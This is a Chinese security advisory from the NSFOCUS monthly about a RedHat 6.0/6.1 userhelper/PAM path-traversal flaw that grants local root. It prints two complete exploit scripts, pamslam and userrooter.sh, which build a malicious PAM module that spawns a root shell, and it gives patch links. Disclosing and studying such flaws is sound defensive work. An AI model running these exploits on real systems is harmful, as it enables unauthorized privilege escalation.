绿盟安全月刊->第5期->最新漏洞 RedHat userhelper/PAM安全漏洞

主页：http://www.nsfocus.com/
日期：1999-12-14

发布日期: 2000-1-6
更新日期: 2000-1-6
受影响的系统:  
RedHat Linux 6.1
RedHat Linux 6.0
--------------------------------------------------------------------------------
描述:

    RedHat 6.0和6.1系统中缺省安装的userhelper和PAM允许使用包含".."的路径名,并且
userhelper被设置了suid root位.因此本地用户可能获得root权限.

    userhleper允许你通过"-w"参数指定一个要运行的程序,这些程序需要在
/etc/security/console.apps目录里有一个对应文件.因此,通过指定类似"../../../
tmp/myprog"的程序名,攻击者可以利用userhelper去执行
"/etc/security/console.apps/../../../tmp/myprog",也就是执行"/tmp/myprog".

    如果"/tmp/myprog"已经存在,PAM将会试图执行它,PAM首先检查是否/etc/pam.d中有"../../
tmp/myprog"相应的配置文件,如果有,PAM将以root身份去打开相应的共享库.但不幸的是PAM
也允许使用包含".."的路径名,因此攻击者可以提供一个伪造的PAM配置文件,里面包含一个
任意的共享库名(这个共享库是由攻击者创建的),当PAM试图用dlopen()来打开这个共享库时,
攻击者就可以获取root权限.

<* 来源:      dildog@l0pht.com (L0pht)         
   相关链接:    http://www.l0pht.com/advisories.html
*>

--------------------------------------------------------------------------------
测试程序：

警 告：以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

------------------------------exploit 1------------------------------------------
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#  
# synopsis:
#    both 'pam' and 'userhelper' (a setuid binary that comes with the
#    'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#    _pam_add_handler(), we can get it to dlopen any file on disk.
'userhelper'
#    being setuid means we can get root.
#
# fix:
#    No fuckin idea for a good fix. Get rid of the .. paths in userhelper
#    for a quick fix. Remember 'strcat' isn't a very good way of confining
#    a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.

cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O

rm _pamslam.c
rm _pamslam.o

echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s

rm _pamslam.so
rm _pamslam.conf

---------------------------- exploit 2 -------------------------------------------

#!/bin/sh
# userrooter.sh by S <super@innu.org>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
        then echo "Machine doesn't appear to be vulnerable :-\\"
        echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>


void pam_sm_authenticate(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}


void pam_sm_setcred(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}
EOF


cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF

gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login



--------------------------------------------------------------------------------
建议:
RedHat 已经提供了相应的补丁:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm


   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm


   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm


   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm


   MD5 sum Package Name

   bffd4388103fa99265e267eab7ae18c8 i386/pam-0.68-10.i386.rpm
   2d69859d2b1d2180d254fc263bdccf94 i386/usermode-1.17-1.i386.rpm
   fed2c2ad4f95829e14727a9dfceaca07 alpha/pam-0.68-10.alpha.rpm
   83c69cb92b16bb0eef295acb4c857657 alpha/usermode-1.17-1.alpha.rpm
   350662253d09b17d0aca4e9c7a511675 sparc/pam-0.68-10.sparc.rpm
   d89495957c9a438fda657b8a4a5f5578 sparc/usermode-1.17-1.sparc.rpm
   f9ad800f56b7bb05ce595bad824a990d SRPMS/pam-0.68-10.src.rpm
   1d3b367d257a57de7d834043a4fcd87a SRPMS/usermode-1.17-1.src.rpm